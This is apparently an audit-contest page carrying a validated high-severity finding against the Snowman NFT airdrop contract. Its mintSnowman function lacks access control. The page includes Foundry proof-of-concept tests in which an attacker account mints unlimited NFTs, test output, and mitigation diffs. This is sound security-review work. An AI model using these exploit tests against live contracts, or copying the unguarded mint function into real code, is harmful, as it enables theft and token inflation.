Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Snowman::mintSnowman lacks access control, allowing anyone to mint unlimited NFTs for free and bypass the airdrop

aclod

# [H-1] `Snowman::mintSnowman` lacks access control, allowing anyone to mint unlimited NFTs for free and bypass the airdrop

## Summary

`Snowman::mintSnowman` is an unrestricted `external` function. It is intended to be called only by the `SnowmanAirdrop` contract after a successful Merkle-proof and signature verification. Because it has no access control, any address can call it directly and mint an arbitrary number of `Snowman` NFTs without owning any `Snow` tokens, without a Merkle proof, and without a signature — completely defeating the airdrop.

## Vulnerability Details

`mintSnowman` has no `onlyOwner`/`onlyAirdrop` restriction:

```solidity

function mintSnowman(address receiver, uint256 amount) external {

for (uint256 i = 0; i < amount; i++) {

_safeMint(receiver, s_TokenCounter);

emit SnowmanMinted(receiver, s_TokenCounter);

s_TokenCounter++;

}

```

The whole point of `SnowmanAirdrop` is to gate minting behind a Merkle proof and an ECDSA signature, staking the caller's `Snow` tokens in exchange:

```solidity

// SnowmanAirdrop.claimSnowman (the intended, gated path)

if (!_isValidSignature(...)) revert SA__InvalidSignature();

if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) revert SA__InvalidProof();

i_snow.safeTransferFrom(receiver, address(this), amount);

...

i_snowman.mintSnowman(receiver, amount);

```

Since `mintSnowman` is public, an attacker can skip every check and call it directly, so all of the airdrop's validation is meaningless.

## Impact

- **Anyone can mint unlimited `Snowman` NFTs for free**, without holding any `Snow`, without being in the Merkle tree, and without a valid signature.

- The airdrop's eligibility model (Merkle proof + signature + Snow staking) is fully bypassed.

- The NFT collection's scarcity and fairness are destroyed; legitimate claimers and the collection's value are harmed.

No funds are needed and no special conditions apply, so the likelihood is **High** and the impact is **High** → **High severity**.

## Proof of Concept

The following test mints NFTs from a fresh attacker account that has no `Snow`, no proof and no signature. Run with `forge test --match-path test/PoC_MintNoAccessControl.t.sol -vv`:

```solidity

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.24;

import {Test, console} from "forge-std/Test.sol";

import {Snowman} from "../src/Snowman.sol";

contract PoC_MintNoAccessControl is Test {

Snowman snowman;

address attacker = makeAddr("attacker");

function setUp() public {

snowman = new Snowman("data:image/svg+xml;base64,FAKE");

}

function test_AnyoneCanMintUnlimitedSnowman() public {

uint256 amount = 5;

vm.prank(attacker);

snowman.mintSnowman(attacker, amount); // no Snow, no proof, no signature

assertEq(snowman.balanceOf(attacker), amount);

assertEq(snowman.getTokenCounter(), amount);

for (uint256 i = 0; i < amount; i++) {

assertEq(snowman.ownerOf(i), attacker);

}

```

The test passes: the attacker ends up owning 5 freshly minted NFTs while the airdrop logic is never touched.

## Recommended Mitigation

Restrict `mintSnowman` so that only the `SnowmanAirdrop` contract can call it. For example, store the airdrop address at deployment and gate the function:

```diff

+ error SM__OnlyAirdrop();

+ address private immutable i_airdrop;

- constructor(string memory _SnowmanSvgUri) ERC721("Snowman Airdrop", "SNOWMAN") Ownable(msg.sender) {

+ constructor(string memory _SnowmanSvgUri, address _airdrop) ERC721("Snowman Airdrop", "SNOWMAN") Ownable(msg.sender) {

s_TokenCounter = 0;

s_SnowmanSvgUri = _SnowmanSvgUri;

+ i_airdrop = _airdrop;

}

function mintSnowman(address receiver, uint256 amount) external {

+ if (msg.sender != i_airdrop) {

+ revert SM__OnlyAirdrop();

+ }

for (uint256 i = 0; i < amount; i++) {

...

}

```

(If the airdrop address is not known at deploy time, use an `onlyOwner` setter to configure it once, then enforce the check.)

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 1 hour ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!